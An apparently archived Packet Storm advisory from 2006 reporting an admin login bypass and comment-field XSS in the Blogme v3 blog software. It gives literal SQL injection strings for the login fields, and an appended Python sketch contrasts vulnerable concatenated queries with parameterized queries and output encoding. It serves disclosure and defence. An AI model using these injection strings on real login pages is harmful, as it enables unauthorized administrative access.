blogmev3.txt

2006-11-16T00:00:00
ID PACKETSTORM:52163
Type packetstorm
Reporter benjamin moss
Modified 2006-11-16T00:00:00

Description

                                        
                                            `vendor site: http://www.drumster.net/  
product: Blogme v3  
bug: login bypass & xss (post)  
risk: high  
  
  
admin login bypass :  
user : ' or '1' = '1  
passwd: 1'='1' ro '  
  
xss post :  
in: /comments.asp?blog=85   
vulnerable fields:  
- Name   
- URL  
- Comments  
  
  
laurent gaffié & benjamin mossé  
http://s-a-p.ca/  
contact: saps.audit@gmail.com  
`
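
An added illustration, not part of the original advisory and not Blogme's code: on an assumed query shape, this Python sketch shows why the quoted user value alters a login query built by string concatenation, how a parameterized query keeps it as data, and how the three comment fields can be output-encoded. Table, column and function names and the sample data are constructed; only the user-field string comes from the advisory.

```python
import html
import sqlite3
from urllib.parse import urlparse

def make_db():
    # Constructed in-memory data; schema is an assumption. Plaintext password
    # only keeps the demo short: real code stores and compares password hashes.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_concat(db, user, passwd):
    # Vulnerable pattern: input is spliced into the SQL text, so a quote in
    # the input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users WHERE password = '" + passwd +
           "' AND username = '" + user + "'")
    return db.execute(sql).fetchone() is not None

def login_param(db, user, passwd):
    # Hardened pattern: placeholders keep input as data, never as SQL syntax.
    sql = "SELECT username FROM users WHERE password = ? AND username = ?"
    return db.execute(sql, (passwd, user)).fetchone() is not None

def render_comment(name, url, comment):
    # Encode every reflected field (Name, URL, Comments); only http(s)
    # URLs are allowed to become links.
    safe_name = html.escape(name)
    if urlparse(url).scheme in ("http", "https"):
        safe_name = '<a href="%s">%s</a>' % (html.escape(url, quote=True),
                                             safe_name)
    return "<p>%s: %s</p>" % (safe_name, html.escape(comment))

if __name__ == "__main__":
    db = make_db()
    user_field = "' or '1' = '1"  # user value quoted in the advisory
    print("concatenated query accepts:", login_concat(db, user_field, "wrong"))
    print("parameterized query accepts:", login_param(db, user_field, "wrong"))
    print(render_comment("<b>n</b>", "javascript:alert(1)", "<script>x</script>"))
```
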